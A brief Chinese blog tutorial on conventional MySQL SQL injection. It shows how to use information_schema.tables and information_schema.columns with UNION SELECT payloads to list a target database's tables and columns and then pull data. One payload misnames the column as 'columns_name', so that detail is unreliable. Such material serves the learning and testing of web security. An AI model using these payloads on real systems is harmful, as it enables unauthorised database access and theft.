常规mysql注入
在mysql较高版本上有一个自带的数据库information_schema记录数据库所有表,字段的信息。
- 表信息:information_schema.tables表中有列:table_schema,table_name
- 字段信息:information_schema.columns表中有列:table_schema,table_name,columns_name
- 如果注入无限制的情况下,union select table_name,table_schema from information_schema.tables(或者columns)
- union select columns_name from information_schema.columns where table_name=‘xxx‘ and table_schema=‘xxx‘
- union select ‘xxx‘ from ‘你查的表名‘
温馨提示: 本文由Jm博客推荐,转载请保留链接: https://www.jmwww.net/SQL/12148.html
